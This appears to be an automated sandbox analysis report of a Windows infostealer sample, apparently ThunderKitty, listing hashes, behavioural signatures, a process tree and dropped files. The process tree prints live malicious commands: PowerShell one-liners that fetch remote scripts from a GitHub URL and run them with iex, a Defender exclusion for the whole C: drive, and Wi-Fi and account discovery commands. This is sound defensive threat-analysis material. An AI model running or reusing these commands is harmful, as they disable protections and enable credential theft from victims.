Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18/08/2024, 17:24

General

  • Target

    2024-08-18_e56801a386d54e4645314b27ce3aa371_poet-rat_snatch.exe

  • Size

    14.0MB

  • MD5

    e56801a386d54e4645314b27ce3aa371

  • SHA1

    5a679efd69e80e98bd86f343cfbc2ba696d84993

  • SHA256

    587deb3ba9d1488c1fe1c802295691fb73ee8380771d856b044b4190c959f49d

  • SHA512

    90b4161763b6a59d8155e95f4c32b907900e96bba2b618e445ca6b8a055d1ae399c9190252d9ec736c271689dce04626c0271f4f9c1b54cfd059c196e4eba0b2

  • SSDEEP

    98304:3bnUCnRjtyn8P0JJdTUwtKWqVVsEce5nRd7HMFMtOJOf5psLvf05SbMAUES1YNSL:r5Rjtyn0VVF99MFMY0f5paEMAABqOfS

Malware Config

Signatures

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Network Service Discovery 1 TTPs 1 IoCs

    Attempt to gather information on host's network.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • System Network Connections Discovery 1 TTPs 1 IoCs

    Attempt to get a listing of network connections.

  • Gathers network information 2 TTPs 3 IoCs

    Uses commandline utility to view network configuration.

  • Kills process with taskkill 1 IoCs
  • Modifies Control Panel 2 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 62 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-08-18_e56801a386d54e4645314b27ce3aa371_poet-rat_snatch.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-08-18_e56801a386d54e4645314b27ce3aa371_poet-rat_snatch.exe"
    1⤵
    • Sets desktop wallpaper using registry
    • Modifies Control Panel
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:2660
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1')|iex"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4316
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\glf5fuia\glf5fuia.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1476
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6C37.tmp" "c:\Users\Admin\AppData\Local\Temp\glf5fuia\CSC9D005112193949B280B94D74C9666CC3.TMP"
          4⤵
            PID:3108
        • C:\Windows\system32\netsh.exe
          "C:\Windows\system32\netsh.exe" wlan show profiles
          3⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Network Configuration Discovery: Wi-Fi Discovery
          PID:3672
        • C:\Windows\system32\net.exe
          "C:\Windows\system32\net.exe" localgroup administrators
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1460
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 localgroup administrators
            4⤵
              PID:2080
          • C:\Windows\system32\netsh.exe
            "C:\Windows\system32\netsh.exe" advfirewall show allprofiles
            3⤵
            • Modifies Windows Firewall
            • Event Triggered Execution: Netsh Helper DLL
            PID:1348
          • C:\Windows\system32\whoami.exe
            "C:\Windows\system32\whoami.exe" /all
            3⤵
              PID:3292
            • C:\Windows\system32\net.exe
              "C:\Windows\system32\net.exe" user
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1632
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 user
                4⤵
                  PID:1656
              • C:\Windows\system32\ipconfig.exe
                "C:\Windows\system32\ipconfig.exe" /displaydns
                3⤵
                • Gathers network information
                PID:3524
              • C:\Windows\system32\net.exe
                "C:\Windows\system32\net.exe" localgroup
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:2128
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 localgroup
                  4⤵
                    PID:3116
                • C:\Windows\System32\Wbem\WMIC.exe
                  "C:\Windows\System32\Wbem\WMIC.exe" startup get command caption
                  3⤵
                    PID:2828
                  • C:\Windows\system32\NETSTAT.EXE
                    "C:\Windows\system32\NETSTAT.EXE" -ano
                    3⤵
                    • System Network Connections Discovery
                    • Gathers network information
                    PID:1572
                  • C:\Windows\System32\Wbem\WMIC.exe
                    "C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe
                    3⤵
                      PID:4556
                    • C:\Windows\system32\ipconfig.exe
                      "C:\Windows\system32\ipconfig.exe" /all
                      3⤵
                      • Gathers network information
                      PID:936
                    • C:\Windows\system32\ROUTE.EXE
                      "C:\Windows\system32\ROUTE.EXE" print
                      3⤵
                        PID:3720
                      • C:\Windows\system32\ARP.EXE
                        "C:\Windows\system32\ARP.EXE" -a
                        3⤵
                        • Network Service Discovery
                        PID:4920
                      • C:\Windows\system32\netsh.exe
                        "C:\Windows\system32\netsh.exe" wlan show profile
                        3⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Network Configuration Discovery: Wi-Fi Discovery
                        PID:4672
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -C "Add-MpPreference -ExclusionPath 'C:'"
                      2⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1112
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1')|iex"
                      2⤵
                      • Blocklisted process makes network request
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:5020
                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\r4pt3ymz\r4pt3ymz.cmdline"
                        3⤵
                        • Suspicious use of WriteProcessMemory
                        PID:4184
                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6A14.tmp" "c:\Users\Admin\AppData\Local\Temp\r4pt3ymz\CSC846F55AA1946405A98AA13EDB8AB249.TMP"
                          4⤵
                            PID:1120
                      • C:\Windows\system32\cmd.exe
                        cmd.exe /c start facebook.com
                        2⤵
                          PID:5064
                        • C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe
                          PowerShell -Command "(New-Object -ComObject SAPI.SpVoice).Speak(\"hey hey\")"
                          2⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:5016
                        • C:\Windows\system32\cmd.exe
                          cmd /c rundll32.exe user32.dll,SwapMouseButton
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:2704
                          • C:\Windows\system32\rundll32.exe
                            rundll32.exe user32.dll,SwapMouseButton
                            3⤵
                              PID:4256
                          • C:\Windows\system32\cmd.exe
                            cmd
                            2⤵
                              PID:3516
                            • C:\Windows\system32\attrib.exe
                              attrib +h +s C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
                              2⤵
                              • Views/modifies file attributes
                              PID:3024
                            • C:\Windows\system32\taskkill.exe
                              taskkill /F /IM wallpaper32.exe
                              2⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4744
                          • C:\Windows\system32\AUDIODG.EXE
                            C:\Windows\system32\AUDIODG.EXE 0x3ec 0x504
                            1⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4732

                          Network

                          MITRE ATT&CK Enterprise v15

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                            Filesize

                            2KB

                            MD5

                            d85ba6ff808d9e5444a4b369f5bc2730

                            SHA1

                            31aa9d96590fff6981b315e0b391b575e4c0804a

                            SHA256

                            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                            SHA512

                            8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                            Filesize

                            1KB

                            MD5

                            23aba7e7ecd37fd9f076dbd4d6e981e2

                            SHA1

                            40150b7db90f125b7b1c7cae65250f3a13a5bbb3

                            SHA256

                            a67ce8b05ec37c76167b8769946b840cee681b0c3a19b8d7c56835ad21221b12

                            SHA512

                            fce8455921832c8960e1aa783091b83fe17aa885b0a86e92d2ada35c76bfc79122d90b0260f6571018d7317ffee0c3bedc7f0bbf4d21a41e77d02e25892d3c9a

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                            Filesize

                            1KB

                            MD5

                            3e2239307a53cbc7115fa375e0dd3a4f

                            SHA1

                            66dd1bf7a2f3ab5a34365c35456dcd73b515911f

                            SHA256

                            68f09fa9f10ee1a8f256d6630285b9f77f2713b676c3a635ceb17adae1e6e7b9

                            SHA512

                            852baecba0a8a88854a9c5042b521beb9be41cb50b6f3408cdcb6002ed99533969139a0cf30ea5965783e1460e597a293ff7a5255694f4ea3b9cd599e041378b

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                            Filesize

                            1KB

                            MD5

                            fa683ba35bef5db77615e4281ba4c0fc

                            SHA1

                            e5d1b282d5160ccbc965b946bcbdaf27f99b0c2e

                            SHA256

                            d02a84de5459810a45b0434f93ecdb8413791c0ada1ae71210a92eed037538a6

                            SHA512

                            a181c916e3df8aefb8d458799e8aafb687007751a425bd288dfcd5de41c93529fde2dd5d6602a075e50f4f2f90886c9a2e6f7255b64325758ae5f355317a36e5

                          • C:\Users\Admin\AppData\Local\Temp\RES6A14.tmp

                            Filesize

                            1KB

                            MD5

                            f2f7809ec8f38baf53c0ff72ef97ab14

                            SHA1

                            a4a7d03e1b7036938381d6e3f36a6d9b28c41c61

                            SHA256

                            7498284ad0094ea9a252078124f3c133a7eb9ef1d1eb0541605ebd2ba54567e1

                            SHA512

                            2d476ce234def8d8cc5fa7ce7964edcaa1e56d863caff639f1e267b2e36027fac72c33631c6a0b25fbdba58c36c9289d18049c067ed4f886c7ae1f5c3e536edf

                          • C:\Users\Admin\AppData\Local\Temp\RES6C37.tmp

                            Filesize

                            1KB

                            MD5

                            9533a629d1322733c724fa30947309e9

                            SHA1

                            b8b501a9cebe500b20bb2696705edfdb3f9ebb9d

                            SHA256

                            0ebc178033e296ddf2ed5733ec6e2631167c1a12757ba32b385f4c3d2403ae6f

                            SHA512

                            90088edd7bbeb8a4ad023502ce86687136aede8041ab650ed0cb57198c8cc9f58359d347ce7e6067ee1b0ea8e81f426496925f82d2cb444c9ef6136b221f78be

                          • C:\Users\Admin\AppData\Local\Temp\ThunderKitty.zip

                            Filesize

                            64KB

                            MD5

                            6dbe63d8a521faf8186b8c9682aae5b2

                            SHA1

                            74c9270c31d64d00cad923ce2c6c05815739d837

                            SHA256

                            59036545c3416a84ce511c5508df5c1953a2959dfa43b124092eef5b7eab5aa6

                            SHA512

                            f00060d398a43cd73438e430c7766a8fbf0f93b2f7d0e9e18c1358eade195e533ec082e6e74ad62fab7ca6234a82e63d15704552687e53adbe4d8d0745d70eec

                          • C:\Users\Admin\AppData\Local\Temp\ThunderKitty\SystemInfo\ThunderKitty-ScrapedCMDS.txt

                            Filesize

                            23KB

                            MD5

                            13e44ecf36aa9455f3e1a7af2f194601

                            SHA1

                            9611bcc31e1266f09b3a8a0ea03dbc8e996b7809

                            SHA256

                            9e4a3716b101a9391f496f76fd7c781a45ea95f9487b13d94e1c2eadf3f9fa39

                            SHA512

                            4ffd50288584ccfae2b7b8b7270a3f2ff4810fdc5b4bf2b4aa6e2237f53766ee17db45a6957ecbfb0d5380945e34d49d9066aa1644ffd8a7fd6ca4265d75b704

                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tddnw0dp.2tb.ps1

                            Filesize

                            60B

                            MD5

                            d17fe0a3f47be24a6453e9ef58c94641

                            SHA1

                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                            SHA256

                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                            SHA512

                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                          • C:\Users\Admin\AppData\Local\Temp\glf5fuia\glf5fuia.dll

                            Filesize

                            4KB

                            MD5

                            7e22553ee937d37475a66dad970694ac

                            SHA1

                            e9dff3dd4457a6f3cff0428ad743eba96b7af975

                            SHA256

                            845507728deef1ef3f7de9084a0b69787c595a9bea77176555fbd2c89dbfb338

                            SHA512

                            0d67787088e39d9bd48eed7c7b65795391e9ee4f9d2952ccd3a015026f863a988b4594b2271fc0ae4c8c875e19ed0b44745f4f63ff5038c7bc4e4c1883212a82

                          • C:\Users\Admin\AppData\Local\Temp\r4pt3ymz\r4pt3ymz.dll

                            Filesize

                            4KB

                            MD5

                            5146df5d8181bc99cf943ef8b39ac050

                            SHA1

                            8a262f18ddc7a22559e27aeb41ab768ba1bd4cf9

                            SHA256

                            d9f957b82f7ea1a73bb9359e2efcf232bad593d502922dd6c2092b5343efe577

                            SHA512

                            a254888bf265e87d1bec65e37d718ab230aad635f8e9987dc2af988387d5ea6916581bca59d98ab7e9ee9881fe4d9003cb3e142939a07edb3fc1b0b55f92cedf

                          • C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1

                            Filesize

                            2KB

                            MD5

                            9758656bbe8589c66bb241b052490c72

                            SHA1

                            b73da83fb3ae6b86c6365769a04de9845d5c602c

                            SHA256

                            e4bfe191530cc53138c4a265755539f8a115f7828faba79dfac91f3184b26351

                            SHA512

                            da9a8ecba8c2071e467f2d72fac524843fb0011c8486dd95e8b948b1c7f91bf02bcb80c20a01eddb6971b96db5ebde5f7c4c607e6b6d15e75d971ea104436e34

                          • \??\c:\Users\Admin\AppData\Local\Temp\glf5fuia\CSC9D005112193949B280B94D74C9666CC3.TMP

                            Filesize

                            652B

                            MD5

                            e1d377a333619abf71dcacf6386ee42a

                            SHA1

                            0e3ea70707d406fc3dd8b9a4f621cefd6a8a9403

                            SHA256

                            96027aac2f21077c1405e9e9995a0d4dae446fbed15721e177ee6857f8691042

                            SHA512

                            1a6a2f7046ae6ff99a09aba0b3a2e0b2972c9b4307102fe4b53d1d5289fdf349bb96a6ac3753383f3a1fb2de51b45405984c8fd4f7cf4493f17a9521da9b7ce1

                          • \??\c:\Users\Admin\AppData\Local\Temp\glf5fuia\glf5fuia.cmdline

                            Filesize

                            369B

                            MD5

                            9c71097c53fcdfc3b6aa41136640a3f6

                            SHA1

                            eb11a6419f5467575f702fb9744a35eb3baa4281

                            SHA256

                            ebe9546de3e22683810fbe7ce70a65e8938c05ba93ff177f956fcc1b56b59749

                            SHA512

                            48f411c8ab5cdf971ae8bc6cb76d79499eca4744f134945e61590ca2b2cef5c1a14d17e14daaaf100daa63a3815450a5c798055e5cebd715042a37df24e2b6f8

                          • \??\c:\Users\Admin\AppData\Local\Temp\r4pt3ymz\CSC846F55AA1946405A98AA13EDB8AB249.TMP

                            Filesize

                            652B

                            MD5

                            b7cf7f597d9c36818c6a8874951590c8

                            SHA1

                            18d6712cb10d7365fdf4e230e7d4ae778c19740e

                            SHA256

                            aafc003d89790f5e0b1d1867e8dc498828a2df6ff9e891a628a405733bdc8a63

                            SHA512

                            966ed12ed5132d962e651b199996a1dbd9b598ca5efe1532b83913f6160890fda94b75c8a231eb204f2071a11036d6f0a21644296d45266e460fa21ee93db032

                          • \??\c:\Users\Admin\AppData\Local\Temp\r4pt3ymz\r4pt3ymz.0.cs

                            Filesize

                            1KB

                            MD5

                            8a1e7edb2117ec5dde9a07016905923b

                            SHA1

                            0155dbeeb16333e2eaa767b0209750efee56f47f

                            SHA256

                            c379ac84c970f2055851b084c44575a5e4b5a70dc25f0acdd49aad306489b007

                            SHA512

                            4ff0601803a006c661c962fe158cd5e9f40031d6b4fd7c5a05969a52d812e1fcb0aab20916fcad6c61c6d44cc7cfdf1e4f344f22ced937a0cd757ad841d3ab21

                          • \??\c:\Users\Admin\AppData\Local\Temp\r4pt3ymz\r4pt3ymz.cmdline

                            Filesize

                            369B

                            MD5

                            cdbe55c01c0c05600d89ae602b0d3f25

                            SHA1

                            6209c7551493a411168db8541ce26cb6891b6ddf

                            SHA256

                            42d136f204065219ffad4f498f2d82f1aa8e28267d6046c33cd20a3d310068ea

                            SHA512

                            336c33be6608a3684c63ebef6a094b26ecea3dc4bf794342d667a7b16a26741716089f50e748e7e311f7a10a51cf5a046deb1b83dda7ef28c88589b58f9f8f31

                          • memory/1112-42-0x00007FFF71520000-0x00007FFF71FE1000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/1112-69-0x00007FFF71520000-0x00007FFF71FE1000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/1112-32-0x00007FFF71520000-0x00007FFF71FE1000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/1112-7-0x00007FFF71520000-0x00007FFF71FE1000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/4316-100-0x000001ACC83E0000-0x000001ACC840A000-memory.dmp

                            Filesize

                            168KB

                          • memory/4316-85-0x000001ACC5B80000-0x000001ACC5B88000-memory.dmp

                            Filesize

                            32KB

                          • memory/4316-134-0x000001ACC83D0000-0x000001ACC83DA000-memory.dmp

                            Filesize

                            40KB

                          • memory/4316-133-0x000001ACC83E0000-0x000001ACC83F2000-memory.dmp

                            Filesize

                            72KB

                          • memory/4316-101-0x000001ACC83E0000-0x000001ACC8404000-memory.dmp

                            Filesize

                            144KB

                          • memory/5016-45-0x00007FFF71520000-0x00007FFF71FE1000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/5016-99-0x00007FFF71520000-0x00007FFF71FE1000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/5020-94-0x00007FFF71520000-0x00007FFF71FE1000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/5020-87-0x000002052B5E0000-0x000002052BD86000-memory.dmp

                            Filesize

                            7.6MB

                          • memory/5020-67-0x000002052A930000-0x000002052A938000-memory.dmp

                            Filesize

                            32KB

                          • memory/5020-0-0x00007FFF71523000-0x00007FFF71525000-memory.dmp

                            Filesize

                            8KB

                          • memory/5020-44-0x00007FFF71520000-0x00007FFF71FE1000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/5020-31-0x00007FFF71520000-0x00007FFF71FE1000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/5020-6-0x000002052A940000-0x000002052A962000-memory.dmp

                            Filesize

                            136KB